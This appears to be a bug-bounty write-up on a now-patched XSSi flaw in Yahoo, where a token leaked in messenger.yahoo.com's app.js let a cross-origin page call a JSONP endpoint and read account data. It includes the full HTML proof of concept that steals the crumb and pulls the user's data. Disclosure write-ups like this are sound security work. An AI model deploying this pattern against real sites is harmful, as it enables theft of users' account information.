While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victims valid .crumb value, I could successfully steal information about their account. I then searched all requests I intercepted in Burp Suite for my valid crumb and I quickly found it in in a dynamic Javascript file located at: https://messenger.yahoo.com/embed/app.js

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don’t understand how XSSi works the vulnerability essentially takes advantage of Same-Origin Policy (SOP) not being applied to Javascript src attribute within the script tag. I then created the following Proof of Concept which steals the valid .crumb value from the dynamic Javascript file at https://messenger.yahoo.com/embed/app.js and then places the valid crumb in the .crumb GET parameter as seen here https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx. which returns a proper response containing information about the user. Using the code below I was able to extract information:

<html>

<head>

<title>Yahoo XSSi PoC</title>

</head>

<body>

<div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">

<h1 style="text-align: center;">Proof of Concept</h1>

<b>Dataset 1:</b>

<div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>

<br/>

<b>Dataset 2:</b>

<div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>

</div>

<script>

function processDeviceUsers(data) {

document.getElementById("content1").innerHTML = JSON.stringify(data);

}

window.onload = function () {

var config = {};

config_data = {};

config.merge = function(data) { config_data = data };

iris.initConfig(config);

document.getElementById("content2").innerHTML = JSON.stringify(config_data);

var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;

var s = document.createElement('script');

s.setAttribute('src', src);

document.body.appendChild(s);

}

</script>

<script src="https://messenger.yahoo.com/embed/app.js"></script>

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>

</body>

</html>

Below is a screenshot of the payload I submitted to Yahoo and received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write up.